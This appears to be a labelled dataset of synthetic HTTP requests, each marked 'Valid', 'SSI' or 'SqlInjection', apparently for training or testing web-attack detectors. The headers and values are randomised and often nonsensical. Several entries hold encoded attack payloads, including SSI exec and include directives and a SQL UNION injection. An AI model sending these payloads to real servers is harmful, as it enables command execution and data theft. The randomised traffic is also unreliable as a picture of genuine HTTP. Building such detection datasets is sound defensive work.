If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 0
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bW05YWV1QWVRZVNhdmFhZXlkc2ljOXNmcm1qaGUxMWtvZjVhdlNiaWVnaWdTdGFy
Referer: /ncme/Seegrkbt.sh
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.9 (X11; U; Solaris 4.8; ep-7U; rv:3.2.8) Gecko/15735145
UA-OS: Solaris
UA-Pixels: 6917x927
Via: 2.0 www.pgNcu.jpeg, 1.7 www.Nsoaetq.jpg
Transfer-Encoding: deflate
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36273
Start - Id: 16670
class: Valid
GET /ClwS/deestts/sUfTOK43/nelteodrccuntehthe/wot6.html?FechoallphpQgVS=iAdCuZomjLi4&Z7un=80&2aasmts=apli+c+wget&iwBBsee=tewhiscisnd&tihiSeohu=%5Cs+mp%28ao&tiiot4=7087690&tmpGw-g2wdocument=sI4jv6Es&wgetiXG=eZYzfX191 HTTP/1.1
Host: www.nerrnje4or.com
Connection: Xcei
Accept: image/*, video/*
Accept-Charset: iso-8859-4;q=0.8, iso-8859-5;q=0.2, isiri-3342;q=0.5, iso-8859-1, shift_jis;q=0.1
Accept-Encoding: gzip, compress;q=0.1, compress;q=0.2, deflate
Accept-Language: *;q=0.2
Cache-Control: mcleca='di8hp'
Client-ip: 49.119.203.133
Cookie: He3qtimT=bwYUwsT
Cookie2: $Version="8"
Date: Tue, 03 Feb 04 19:15:36 CET
ETag: W/"iSyHmqE12WxNZl-P"
Expect: 100-continue
From: tjucAt@b0hi.gov
If-Modified-Since: Sat, 17 Jan 09 09:57:26 CET
If-Unmodified-Since: Fri, 10 Oct 08 14:16:17 UTC
If-Match: "ilCT83I9vVwvncUc"
If-None-Match: ".ZH33J9ygun2VA5_"
If-Range: Sat, 31 Oct 09 07:12:31 GMT
Max-Forwards: 4
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: Digest nonce
Range: -9453,5-40420,64432-847429
Referer: http://www.ltlae.com/sqdiq/jCatei/ahN2/ohcuaL3n/aunau.tiff
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (X11; U; Solaris 3.4; e8-tn; rv:3.1.7) Gecko/90970832
UA-CPU: x86
UA-Disp: 9393,0973,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 0tune/3.0 99.241.90.251, 4.2 197.50.41.252:2
Transfer-Encoding: identity
Upgrade: bt5iw/9.8, eelOhb/1.7, sstab/7.9, e3e/5.2, ifooo/5.5
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16670
Start - Id: 40087
class: SSI
GET /faumpNietyw0cfIcbs/gmailzwnFAGRDakW/aIiq_F4WXAt8RGcmyUWN/hNp-8WNFqh3W.jsp?snnelabheap=8system&issh=68224&trjz2mnteie=373&iapaaasod4sa7=jn&em8Tutisntee=scripte%29%25+eeo&e27ea3=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l++%2Fhome%2Ftwsn%2Fie9nu%22+++++--%3E&JK161k=6681758&bKPSDOt=8ieeohj5i&Yo2FNyD=uor&zpeoVdwtN7=807339&15OAH3YwIzq=5476128 HTTP/1.1
Host: 105.7.232.68
Connection: 8aerqrr
Accept: text/html;q=0.9, video/quicktime;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.6, deflate;q=0.8
Accept-Language: dean-aOnfiar, xhnlqoaa-onqnaoiq;q=0.0, e-nfe11ec
Cache-Control: no-store
Client-ip: 139.170.207.9
Cookie: tre9a=nhy
Cookie2: $Version="509"
Date: Sun, 10 Aug 08 18:14:10 UTC
ETag: W/"t_9Ac4oG2tQdKAOiS0"
Expect: iotagppj=M2nn;eceo=idattnde
From: eolu8j@aioa.fr
If-Modified-Since: Mon, 10 Oct 05 20:44:53 GMT
If-Unmodified-Since: Tue, 10 Feb 09 23:31:16 GMT
If-Match: "amwBYwcRcUcQYb0qO"
If-None-Match: "fk8cu4sMfGdoBgsFDG"
If-Range: Sat, 25 Apr 09 22:13:54 CET
Max-Forwards: 73
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM aHJlb3M2TWlpdGVvbW5OZVR1d29lM2lpdGFpdHNlaGV2UnRkc2x0ZWU=
Range: -170
Referer: http://www.s9te.be/mrtwE/hr5Re.mdb
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: cl4mfablZOceew
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0944x596
Via: FTP/5.9 www.rpWeNT.gif, 2.5 www.eoko.png
Transfer-Encoding: deflate
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40087
Start - Id: 19643
class: Valid
GET /uihtaldaoh7n819nr/eK.kVLkbZ3_3J3svyy-H/en15Zeiku2dtsnd/r4l.x.js? HTTP/1.0
Host: 126.63.165.150
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: w4ttoses-aWneJats;q=0.1, 2qht-kedi;q=0.0, eoawdoss-s;q=0.1, Pbag4-aptns3sE
Cache-Control: no-transform
Client-ip: 40.135.108.239
Cookie: SzxVmlsopU5http=65
Cookie2: $Version="3"
Date: Fri, 21 Oct 05 14:12:07 UTC
ETag: W/"CUhNPirgxLy0Moc"
Expect: 5iapapo
From: 1w5p@ldioneiIcg.ch
If-Modified-Since: Tue, 16 Dec 08 20:41:36 GMT
If-Unmodified-Since: Mon, 19 Jun 06 01:38:15 GMT
If-Match: "dR@P-O_8cQYa93PxPp"
If-None-Match: *
If-Range: "10UVof_xR3fy2kd"
Max-Forwards: 1694
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: Digest algorithm=ciiIies
Range: -024991,27106-5914,1905-57
Referer: /tv5q/cmnum.mpg
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 6.8; wM-4d; rv:4.8.2) Gecko/11055162
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2031x847
Via: FTP/9.8 246.94.189.150, HTTP/6.8 www.tLeCcm.css:420, FTP/8.8 164.162.224.121
Transfer-Encoding: sdzd3e
Upgrade: emf/6.5
Warning: 810 www.eaz2f.html "uaAp" 
X-Forwarded-For: 44.241.139.6
X-Serial-Number: 46232524708716277556
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19643
Start - Id: 18961
class: Valid
GET /nnfoeRnieee2h/sdn/yCaJc@azEtBFa-woZme/staeuorpno/pDHbNsePwfn02fN7Tv.aspx?unorz=osjlI&tevarU=w5t&l6e75Os=aq7X6SX&esctidimoi=aathhpr0eixx4c8unn&begeehwaws7cn=eX9J41OG5v%40&@lEscriptgehtacces.N7s=4fYR&ptjoat4=tRdN- HTTP/1.1
Host: www.7iairqN7nz.de:80
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.0, utf-7;q=0.6, x-mac-hebrew;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 79.237.56.253
Cookie: hdk1oTknI1=d6eo8eie;eSwaec=iTCnrot7ue;la1dltNeorpntr=aXg1A7tgQt3;nade9en=|xvItor;tdfe=bit;vtpuuw=h8Rett
Cookie2: $Version="358"
Date: Wed, 02 Jan 08 18:56:45 UTC
ETag: "R.jMxP8GeCxAaao"
Expect: hcha=xprlbanf
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 09 Oct 08 12:21:29 UTC
If-Unmodified-Since: Mon, 12 Oct 09 19:18:01 GMT
If-Match: "h3PFOs_KciMpZUlT"
If-None-Match: *
If-Range: *
Max-Forwards: 0505
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: snekwy 7hsme=eyermr
Range: -955518,84-,42-
Referer: /D1aul/Wdoieboy/n4At7wD.mp3
TE: trailers,deflate;q=0.2,chunked;q=0.9
Trailer: Authorization
User-Agent: Mozilla/4.0 (compatible; MSIE 7.5; Solaris; l8edr; zicesr)
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: 7.2 100.118.125.120, 2.3 www.ZsausYE.png
Transfer-Encoding: deflate
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 274 103.50.6.94 "Nnxruknc1" "Wed, 14 Dec 05 19:16:26 UTC"
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18961
Start - Id: 8671
class: Valid
GET /eraCd9co42osargrlati/r4xqd@Sy6RT/maEtfneosihje0/r0d/inn1iclr0i/wPR5.cfm?naeumbxoif4aeE=qyrBsdha7raha HTTP/1.0
Host: 64.159.4.232
Connection: keep-alive
Accept: audio/basic, text/plain;q=0.1, audio/basic;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 164.241.30.188
Cookie: tdnntGi9lt3t1b=el;ebodyREU5ZPpsRV=uierr e(-svsenph-h1v;o5o=36;of=6fiwlT;fo4aXnanlienf7m=3536782;iinEG=itZRTPH4-a
Cookie2: $Version="778"
Date: Wed, 16 Apr 08 18:19:10 GMT
ETag: "iY9VMKxeuws3lNflAJKJ"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Mon, 12 Apr 10 05:55:47 GMT
If-Unmodified-Since: Fri, 24 Oct 08 17:46:36 UTC
If-Match: *
If-None-Match: "lxy43cnjgnvjNzv"
If-Range: "1.kIhHuaBABfsMlPp"
Max-Forwards: 312
MIME-Version: 1.4
Pragma: nva='1'
Proxy-Authorization: Digest response="DbdAB10dA04Cb5E87ec2504c6CDbdbE0"
Authorization: enntrt boer7eg=dpmtt
Range: -766,58-986789
Referer: /elcfset/dp6ee/sTooh/didhEum/araaT.js
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: 9eQn2E (rBOGIG; laV1dAj-tx; ey4cvQjb)
UA-CPU: MIPS
UA-Disp: 502,6402,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8393x485
Via: 0.8 www.itiild.js, 7.9 68.7.184.28
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 173 52.61.224.109 "iicxlea7tnjtatQp" 
X-Forwarded-For: 199.125.170.108
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8671
Start - Id: 4711
class: Valid
PUT /ufYrhkVyPM/an1QqhGeM4/tKGz-m/hKaF0lsusLHe7M8mPn/4DgXeEZwFm8J-Yd/ra-3sMI@FeTDHHK73x-/8vHlb4tE3/swMZySpYq0pCxT.2/fPvjE0/nms0t/tNBTHi0orAtqM.uR/e4xD.nsf? HTTP/1.1
Content-Length: 14
Content-Language: ot7o2
Content-Encoding: compress
Content-Location: /idrct/WanU89x.php4
Content-MD5: ZFRlaWFoZ1luZXNvc2Vzdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 May 08 15:17:01 CET
Last-Modified: Sun, 27 Feb 05 24:08:46 UTC
Host: 18.214.132.142
Connection: rRa0vgpt
Accept: audio/*;q=0.4, application/*, video/*
Accept-Charset: shift_jis, macintosh;q=0.8, x-mac-japanese;q=0.9, iso-8859-2, iso-8859-8-i;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 206.185.144.175
Cookie: erTvlHUEr4fct=arxOd;yYjOvqQoh7DQ=642;ndOkoqzene=er;s7f7scriptQFj=66218;aNa8T5stGwnnSr=8snatdlcdpetti;a5dldejor=31477994
Cookie2: $Version="8"
Date: Wed, 14 Nov 07 10:06:07 GMT
ETag: W/"VyJdBW_j39y7gy@nVHjI"
Expect: 100-continue
From: inn4cep@izie0elen.de
If-Modified-Since: Fri, 09 Apr 10 02:01:53 UTC
If-Unmodified-Since: Tue, 16 Nov 04 13:52:28 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jan 04 14:53:41 UTC
Max-Forwards: 9
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: nndopo gzZ7d=gfeaIet
Authorization: Digest nonce
Range: -242,-19368,124822-039647
Referer: http://ipusgsht.st/1fsHm.wav
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 6.1; xc-k6; rv:7.9.8) Gecko/71682330
UA-CPU: 68000
UA-Disp: 759,838,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 868x5971
Via: 6.5 123.163.148.142, FTP/6.5 www.siekvet.gif
Transfer-Encoding: deflate
Upgrade: e6Tb/5.8
Warning: 098 235.30.125.178 "esttjUveeeheane5ia" "Thu, 27 Dec 07 01:39:19 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 669900608328585
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

rdstowp=386740

End - Id: 4711
Start - Id: 41786
class: SqlInjection
GET /eWAlc1UCYv3K/tNMDE5/2c9h695SUy.24z875DQx/sq/a3GI2T-.z5xend/sB@TeZt/jIaE2Q9eH94/tpresiycbttnoDrnrnho/ur9o1oorttriDtpit/gH1i-4iQ/yREdwKXh_p.mdb?uAena=%27+%29+UNION++++ALL+++SELECT++++9574+++++FROM++teuR+++WHERE+++++%28%27%27++++%3D+++%27 HTTP/1.0
Host: www.or7dGo.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.3, compress, deflate;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.101.148.145
Cookie: ipkRRstyle-OTlw=uoXYwj;ifl7itsw=56;wn6imierouwNna=6
Cookie2: $Version="3"
Date: Sat, 13 Nov 04 09:14:29 CET
ETag: ".4g273Gu0e1YegQr"
Expect: cvnt=RiEntn
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: 1drue cinwmP=lveSh
Range: 369-326377,-88
Referer: /it98.nsf
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 5.1; QT-2u; rv:9.7.8) Gecko/86359551
UA-CPU: x86
UA-Disp: 4110,3651,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: yswa/6.4
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41786
Start - Id: 3
class: Valid
GET /fonRnt/7N.D-4BRSsXb@TU/qgheW.cfm? HTTP/1.0
Host: www.anantoiid.org:70
Connection: close
Accept: image/*
Accept-Charset: iso-8859-8-i, x-mac-ce;q=0.5, iso-8859-6, utf-7
Accept-Encoding: compress, compress, identity;q=0.6, deflate;q=0.1
Accept-Language: *
Cache-Control: no-cache
Cookie: oarraatavd=tisrP3n5mopsy;C.psdnB=87378
Cookie2: $Version="388"
Date: Thu, 27 Apr 06 24:36:50 UTC
ETag: "kAPqiaNm18b1MKgZ"
If-Modified-Since: Thu, 18 May 06 01:58:48 GMT
If-Unmodified-Since: Fri, 19 Sep 08 10:20:47 CET
If-Match: *
If-None-Match: "TUD-@txzS1E7VL4uN0"
If-Range: "GWD4e6gWYw2q5y_L._"
Pragma: vthu=ifdlS4il
Authorization: serxC icratfqu=lbeghUr
Referer: /xcsuks.msf
TE: deflate;q=0.7,deflate;q=0.1,deflate;q=0.2
Trailer: TE
User-Agent: nhgiopIe/7.8.4.7.0
UA-CPU: MIPS
Via: 6.4 www.miens.jpeg, dtm6f/4.4 www.erllifha.jpg, 1.7 www.5feukx.css
Transfer-Encoding: wria
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Serial-Number: 157557837076027

null

End - Id: 3
Start - Id: 29433
class: Valid
GET /04D6XlsTFe0Xshutdown@dJ/tMj@@Rf3TzgZdOx@7AF7.asmx?iidc=Nehel&L2Doea5a26Dele=%3Btssa2r%5C+pG%3Btvrgpositionf3&isizsmse=Da&seiue=odnnsHu&pzblvl=ai8zenowoimsmgnt&i7e9lohnf=7ef%29jc&OJGCj9kkM5R=1478&Odotmsi=sioex&OHco=ytlosl&TfN8ge=eApeLmE&rakji=T%3CtiahNt&myhao=+89alibh8b&b1delete1=84185&hE=nt HTTP/1.1
Host: www.rcqqat.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: tjebl=4
Client-ip: 105.111.8.49
Cookie: nd=ureplaceEida2e);iderstt5thtwt=pegroup byocn;rTnm=59838096;emeH=aoptw&betweentitw7 1;ebcecste=F dm5og
Cookie2: $Version="346"
Date: Wed, 21 Nov 07 15:57:24 GMT
ETag: "NQ_ww-7a3NMMeGHVHC"
Expect: e4skeya=nemhrRk;zegybsow
From: suaPf@niebaoeya.org
If-Modified-Since: Sun, 11 Oct 09 24:18:47 GMT
If-Unmodified-Since: Fri, 09 Apr 10 23:57:47 UTC
If-Match: "UEpnljU..Bx5rp6X"
If-None-Match: "rrS3BjWA@S2.hlU.Wa0f"
If-Range: Sat, 24 May 08 20:03:48 GMT
Max-Forwards: 056
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic cm9zbjRkcDpyczM3c2FoZQ==
Authorization: Digest response="fFB9D3bde0Db6f4D2A3D76bA55B0bB2E"
Range: 2-278,82-815
Referer: /igcExTbh.swf
TE: chunked;q=0.0,chunked;q=0.1,gzip
Trailer: Upgrade
User-Agent: snrtoE6Ja (iE8M9kw; lTVBmY; n6AMg4; 20cpis; oOR7Cp)
UA-CPU: PowerPC
UA-Disp: 2709,267,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7858x401
Via: 0.3 196.69.60.199, 0.0 95.38.249.67, HTTP/5.8 150.13.25.221
Transfer-Encoding: deflate
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 754248
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29433
Start - Id: 18480
class: Valid
GET /i8l3oEac8fyoRets/wHBZ_4@1Mb.js?uurhits4la0=efNsl.-h HTTP/1.1
Host: 239.44.27.153
Connection: bitefdRn
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0emeo-ratx, nr-acsI;q=0.8, Ei6uNb-Go, w-ptoy, am8s-r9esfx
Cache-Control: min-fresh=90
Client-ip: 79.15.108.140
Cookie: ne0i8il8nfiIj6g=ul55odaeZg;hdrteestco4npei=7864484;ebek3od4=kTDnK._J;mnsdpsYre=deleteextermd<meg ]&j66qm
Cookie2: $Version="70"
Date: Thu, 07 Feb 08 22:00:00 CET
ETag: W/"kcQq-97mGk7WVeND3ug"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Sat, 19 Sep 09 10:33:41 CET
If-Unmodified-Since: Sun, 15 Feb 04 08:06:03 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Apr 05 13:04:21 UTC
Max-Forwards: 3
MIME-Version: 1.9
Pragma: i='i'
Proxy-Authorization: Basic aWVoVGh1ZXQ6YW9oaA==
Authorization: Digest cnonce="9Nlhaaeo"
Range: 7-,-428485,871762-
Referer: http://www.dtWhoe.st/h3tn/ras0da18/lseoanGa/vjrhja/D0esO.tar.gz
TE: chunked,trailers,trailers
Trailer: Trailer
User-Agent: 3cdsowtsmwBi7d
UA-CPU: x86
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 934x751
Via: HTTP/3.2 www.11edmEi.png:4
Transfer-Encoding: gzip
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 194.234.50.19
X-Serial-Number: 63866719
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18480
Start - Id: 29868
class: Valid
GET /eTnwt/h0Sw-.allIUJk5-Mdiv/yoeyad4fe9c4einueeE/tefztta6mrwsan9yztt/9eahnVxKPD.asp? HTTP/1.0
Host: 88.160.10.67
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: snbd-7seSre;q=0.0, idawnf63-noitd
Cache-Control: only-if-cached
Client-ip: 192.8.187.37
Cookie: e6cTierdaia=gostTow=sd3z;xte=soweS;piunespxd=9;s0undPholnne=n13uC
Cookie2: $Version="615"
Date: Sat, 21 Jun 08 14:14:25 GMT
ETag: W/"_IjatwEpMy_E.-i5EQ_n"
Expect: ermu
From: hggtsom6@ieylr.uk
If-Modified-Since: Sat, 30 Oct 04 11:14:47 UTC
If-Unmodified-Since: Mon, 07 Jan 08 04:22:58 CET
If-Match: "qWYDZy_5bi2iRLoOx73u"
If-None-Match: "GjkUPWhH.jAqOGL"
If-Range: *
Max-Forwards: 4676
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: Basic YW5zdnV0YTpjb1JhOXE=
Range: 955167-75,390-,1-
Referer: /teRSOI/wlro.mpg
TE: chunked,deflate;q=0.9
Trailer: Via
User-Agent: 9wm4GKDJ5 http://www.ataer7.org
UA-CPU: StrongARM
UA-Disp: 724,467,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 2.9 19.111.183.191
Transfer-Encoding: identity
Upgrade: an1xa/7.5, saltfi/7.3, Yri8/0.3, y6siea/3.9, snse/6.7
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29868
Start - Id: 16931
class: Valid
GET /orntgDiBelm/sorntoAhdF7o/-OUXDs/SN1N_/o8VZRzOF-PuJmFpXLC/tpfsD9UgE/ah0zmo0HKaHUeMtyl/tagct72dht6xCilerlnr/te9nvh9u/i7.bzUomhfDx2/e.1lctu-.cgi?kqoyht=apositiond3updateao2t&0.LAX=237637&UuAFWHe=1&obfrucod=nzenSK1HAiO&kcLskcoazgsr=qfth&umhdtucMeEnc4Gs=Dnaom&ernoogo1c4eabg=68&preeirniono4ihe=663298&enh7o=0059 HTTP/1.1
Host: 163.193.53.182
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-5, hz-gb-2312;q=0.9, iso-8859-15;q=0.7, iso-8859-5
Accept-Encoding: 
Accept-Language: lii-lH, h-a;q=0.9, zehSet-a;q=0.9
Cache-Control: max-stale=72
Client-ip: 65.159.241.124
Cookie: mDJzQX=ota e;Eutn=403
Cookie2: $Version="06"
Date: Wed, 20 May 09 22:08:50 UTC
ETag: W/"4NVYid-mZK783WAOQIm."
Expect: etn3eon
From: 9oleozEn@dpalvntEm.gov
If-Modified-Since: Tue, 10 May 05 05:47:40 CET
If-Unmodified-Since: Thu, 07 Sep 06 18:45:58 CET
If-Match: "M59GLxQvMfrshwMkj"
If-None-Match: *
If-Range: "41-tunPyavycPVsnWg"
Max-Forwards: 80
MIME-Version: 2.3
Pragma: 6ekgcea0='E'
Proxy-Authorization: ilera ftnruhuo=doFpte
Authorization: NTLM c2VlNGNwaHRhcjVoc2hvOTVjbmlyeWFpYTRnemM3dHVsbjZhem9laWdITmxlZXI=
Range: -648885,06-7154
Referer: /grdR/noAiCP/raaY/ctnT7m.pdf
TE: trailers,chunked;q=0.3,trailers
Trailer: Upgrade
User-Agent: 3tetoitwel5
UA-CPU: 68000
UA-Disp: 035,022,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 581x0277
Via: Nads/6.4 56.77.240.174
Transfer-Encoding: esr1i
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 806 www.lseMOv9c.tiff "itnttbznite" "Sat, 02 Jun 07 01:31:43 UTC"
X-Forwarded-For: 91.82.248.105
X-Serial-Number: 00550
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16931
Start - Id: 20484
class: Valid
GET /lPjQw-JUWw@pKS/shAGzifrhre/H4pMimgAMG/t0fSLhFQxtbdfr/tzj0wRx0Q_/bS.msf?1henbdtttap=15&5o7Ectcsrlax=otool%29ndenl&Ne8zs=tez9Xk&imr9=hLhqI9&2Oh=976&boot.iniEmh24=tgrhjkerhnq&Rm8DJpS=n8YXj7&agnrgptin=4587600111&onxii13m=l+yaqsnodeo%3E&iesii7teu3e=ielu HTTP/1.0
Host: www.WupieSekf.cz
Connection: keep-alive
Accept: audio/*, text/html;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: htsea-scNz8a, h6aeo-h;q=0.6, btwie-nsfTEow;q=0.9, d3ekpz-rdan5
Cache-Control: max-stale
Client-ip: 117.165.251.243
Cookie: unah1l0nsi=edivoon
Cookie2: $Version="7"
Date: Tue, 19 Feb 08 08:36:14 GMT
ETag: "G08a2XqgxXVoC6KbxFG6"
Expect: xakt=laq4H7
From: dsreo@aregoinma.st
If-Modified-Since: Mon, 25 Jun 07 05:33:49 GMT
If-Unmodified-Since: Sat, 04 Nov 06 15:52:42 GMT
If-Match: "@cWdRfDJfRkmyBNy4F"
If-None-Match: "xP1VBgRJicrGsiz3G"
If-Range: "yTpRKWNUHQlY_0YK"
Max-Forwards: 722
MIME-Version: 4.7
Pragma: bztEdqae=urnsz
Proxy-Authorization: Basic c25FaXRiOnNhZWJ1
Authorization: oben igidkizl=mjho
Range: -896,61-724379,-171
Referer: http://En1b.biz/uoesrq/ennfdIto/o5lsdmin.jsp
TE: trailers
Trailer: From
User-Agent: rranwAta/5.4.8.0.6
UA-CPU: MIPS
UA-Disp: 428,0883,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3372x6941
Via: HTTP/6.9 97.144.28.140
Transfer-Encoding: gzip
Upgrade: qrcge/0.3, lfahc/7.7
Warning: 199 www.ztlqcle.jpeg:4074 "oikhvtxteeeeatnI" "Wed, 14 Feb 07 19:29:02 UTC"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 025237618
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20484
Start - Id: 39724
class: SSI
GET /-3wW05L2N7.htm?sespceeetqwi=1008643&nrwaSshA=n_ICL&ravRnp=1929&Ahnsio=s&itihoHS=tXwYt+MCdocumenttwnc%3Aw1&wkiend=%3C%21--++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&aeNT6=7&8ttrH9=arezoOegwrofec&Rrm9e9lrucEw00=w2f9Vx6&pSen8locationi=lZZ-Q&Cubqhctatttat9=oN_feQl5yYm&Liuet6E0c=dhc+&bs2uk=dadmin&syoC=7g%24aeimg+%2FIu HTTP/1.0
Host: www.readEely.st
Connection: keep-alive
Accept: text/*;q=0.8, application/rtf, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 55.223.250.116
Cookie: yeihfeeta=1573;nph-L50select7=sZSN0uGjAD
Cookie2: $Version="346"
Date: Thu, 03 Apr 08 10:09:18 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Thu, 24 Mar 05 13:06:44 GMT
If-Match: "OYBriI2wnOBw8UzR"
If-None-Match: *
